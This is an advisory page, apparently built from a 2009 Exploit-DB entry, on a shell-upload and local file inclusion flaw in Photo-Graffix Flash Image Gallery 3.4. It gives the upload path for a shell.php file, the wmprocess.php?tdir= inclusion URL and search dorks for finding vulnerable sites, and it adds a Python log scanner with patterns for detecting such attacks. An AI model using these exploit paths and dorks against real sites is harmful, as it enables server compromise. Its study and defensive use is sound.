Vendor: Photo-Graffix Flash Image Gallery
By: ahmadbady
CVSS: 9.3 (HIGH)
Local File Inclusion
CWE: 98
Product Name: Photo-Graffix Flash Image Gallery
Affected Version From: 3.4
Affected Version To: 3.4
Patch Exists: NO
Related CWE: N/A
CPE: a:photo-graffix:photo-graffix_flash_image_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

shell upload/local file

Photo-Graffix Flash Image Gallery 3.4 (Photo-GraffixV3.4.zip) is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability by uploading a malicious shell file to the web application and then accessing the file via the vulnerable wmprocess.php script. This allows the attacker to execute arbitrary code on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
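
A detection-side companion to the mitigation above, added here as an example and not part of the original advisory or the product's code: it scans web access logs for the two request patterns the advisory describes, a tdir value on wmprocess.php that leaves the gallery tree and a script file served from the music upload directory. The combined log format, the /gallery/ install path, the extension list and the premise that legitimate tdir values are relative paths are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed Apache/nginx combined log format; only the request line is parsed.
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d{3}')
# Extensions a media upload folder should never serve (assumed list).
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar|pl|cgi|asp|aspx|jsp)$', re.I)
# tdir values that climb out of the tree, are absolute, use a wrapper, or carry NUL.
BAD_TDIR = re.compile(
    r'(\.\.[/\\]|^[/\\]|^[a-z]:[/\\]|^[a-z][a-z0-9+.-]*://|\x00)', re.I)


def classify(line):
    """Return a list of finding strings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    path = unquote(url.path).lower()
    findings = []
    if path.endswith("/wmprocess.php"):
        # parse_qs percent-decodes, so %2e%2e%2f is seen as ../
        for value in parse_qs(url.query, keep_blank_values=True).get("tdir", []):
            if BAD_TDIR.search(value):
                findings.append("suspicious tdir value: %r" % value)
    if "/music/" in path and SCRIPT_EXT.search(path):
        findings.append("script requested from upload directory: %s" % url.path)
    return findings


def scan(lines):
    """Return (line_number, finding) pairs for every flagged log line."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in classify(line)]


# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Apr/2009:10:00:01 +0000] "GET /gallery/wmprocess.php?tdir=albums/summer HTTP/1.1" 200 512',
    '198.51.100.9 - - [08/Apr/2009:10:02:13 +0000] "GET /gallery/wmprocess.php?tdir=..%2F..%2F..%2Fetc%2Fhosts HTTP/1.1" 200 231',
    '198.51.100.7 - - [08/Apr/2009:10:03:40 +0000] "GET /gallery/music/track01.mp3 HTTP/1.1" 200 40960',
    '198.51.100.9 - - [08/Apr/2009:10:05:02 +0000] "GET /gallery/music/shell.php HTTP/1.1" 200 87',
]

if __name__ == "__main__":
    for lineno, finding in scan(SAMPLE_LOG):
        print("line %d: %s" % (lineno, finding))
```

A hit on the second pattern means the upload directory is executing scripts, so the web server should also be configured to serve that directory as static content only.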
Source

Exploit-DB raw data:

  =-=-shell upload/local file-=-=

-=-=-=-=-=-=-=-=-=-=
script::Photo-GraffixV3.4.zip

Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.photo-graffix.com/V3/Photo-GraffixV3.4.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
upload:
/path/mp3upload.htm ===> shell upload

shell = /path/music/shell.php
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
xpl:
/path/wmprocess.php?tdir=[open local file]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
dork: "powered by Photo-Graffix Flash Image Gallery"
  "powered by Photo-Graffix"
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2009-04-08]